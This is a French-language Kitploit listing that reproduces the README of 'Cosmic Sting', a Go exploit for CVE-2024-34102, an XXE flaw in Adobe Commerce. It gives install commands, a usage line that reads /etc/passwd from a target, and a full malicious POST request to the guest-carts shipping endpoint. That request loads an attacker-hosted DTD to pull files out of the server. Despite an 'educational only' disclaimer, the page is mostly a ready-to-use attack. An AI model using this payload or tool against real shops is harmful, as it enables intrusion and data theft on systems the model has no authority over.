Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-34102 — Exploitation CVE-2024-34102 | Kitploit
Outils/GitHubGitHub/bughuntar/cve-2024-34102
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubbughuntar/cve-2024-34102

CVE-2024-34102

Exploitation CVE-2024-34102

Voir le dépôt
522il y a 2 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cosmic Sting : Exploiteur CVE-2024-34102

Cosmic Sting est un outil basé sur Go conçu pour exploiter CVE-2024-34102, une vulnérabilité d'exécution de code à distance.

Détails de CVE-2024-34102

Les versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 et antérieures d'Adobe Commerce sont affectées par une vulnérabilité de restriction incorrecte des références aux entités externes XML ('XXE') qui pourrait entraîner l'exécution de code arbitraire. Un attaquant pourrait exploiter cette vulnérabilité en envoyant un document XML malveillant qui référence des entités externes. L'exploitation de ce problème ne nécessite pas d'interaction de l'utilisateur.

Prérequis

  • Go (1.16 ou supérieur)

Installation

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. Installez les dépendances (le cas échéant) :

    root@kitploit:~
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

URL unique

Pour exécuter l'outil avec une seule URL :

root@kitploit:~
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"
Télécharger l’outil

Options

  • -u, --url : URL unique à exploiter.
  • -f, --file : Fichier à lire via SSRF.
  • -l, --list : Fichier contenant une liste d'URL à exploiter.

Requête POST avec fichier DTD XML malveillant :

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

Licence

Ce projet n'est pas sous licence, il est uniquement réalisé pour un projet personnel.

Contribution

Les contributions sont les bienvenues ! Veuillez ouvrir une issue ou soumettre une pull request pour toute modification.

Avertissement

Cet outil est destiné uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez l'autorisation de tester.

Auteur

Professor the Hunter --> Suivez-moi sur Twitter